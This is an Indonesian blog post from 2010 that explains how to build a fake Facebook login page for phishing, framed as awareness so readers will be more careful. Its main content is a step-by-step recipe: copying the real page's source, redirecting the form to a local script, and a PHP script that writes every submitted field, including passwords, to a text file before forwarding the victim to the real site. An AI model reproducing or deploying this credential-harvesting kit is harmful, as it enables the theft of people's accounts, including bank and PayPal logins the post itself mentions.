Setelah sebelumnya saya beri tips untuk terhindar dari phising para cracker kini saya akan beritahu cara cracker membuat situs palsu atau fake login untuk digunakan phising. Saya share disini hanya untuk pengetahuan saja dan agar kalian sadar betapa mudahnya membuat fake login jadi kalian akan lebih berhati-hati.
Yang pertama-tama harus dilakukan adalah dengan mengunjungi situs aslinya. Misalkan saja http://www.facebook.com/ kemudian buka source codenya.
Setelah itu copy source codenya dan paste ke dalam notepad atau program text editor lainnya. Cari code “action=” dan ganti code setelah “action=” dengan “login.php”.
Kemudian ganti code setelah code “method=” dengan “get”.
Simpan dengan nama index.php dan selanjutnya copy code PHP berikut di notepad dan simpan dengan nama login.php
header(“Location: http://www.facebook.com/login.php “);
$handle = fopen(“pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Kemudian buka notepad dan jangan diisi apapun langsung simpan dengan nama pass.txt. Tinggal upload ke webhost ketiga file tadi.
Saya sengaja tidak meberitahu cara-cara membuat situs palsu di atas secara blak-blakan, saya hanya ingin kalian tahu betapa mudahnya metode phising itu. Kalau cuma akun Facebook, Friendster, dan Email saja mungkin tidak begitu penting tetapi bagaimana kalau akun PayPal atau bank kita yang bocor pasti kita akan rugi besar.
Senin, 31 Mei 2010
Inilah Cara Cracker Membuat Situs Palsu Untuk Phising
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar